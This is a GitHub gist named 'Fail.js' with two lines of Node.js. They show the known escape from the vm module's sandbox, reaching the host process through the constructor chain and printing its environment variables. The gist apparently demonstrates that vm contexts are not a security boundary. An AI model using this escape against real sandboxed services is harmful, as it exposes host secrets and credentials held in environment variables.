Created
August 16, 2019 08:25
-
-
Save lazorfuzz/8f2615522fc059a5f3ea64cc51bec5ec to your computer and use it in GitHub Desktop.
Fail.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const vm = require('vm'); | |
| console.log(vm.runInNewContext('this.constructor.constructor("return process")().env')); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment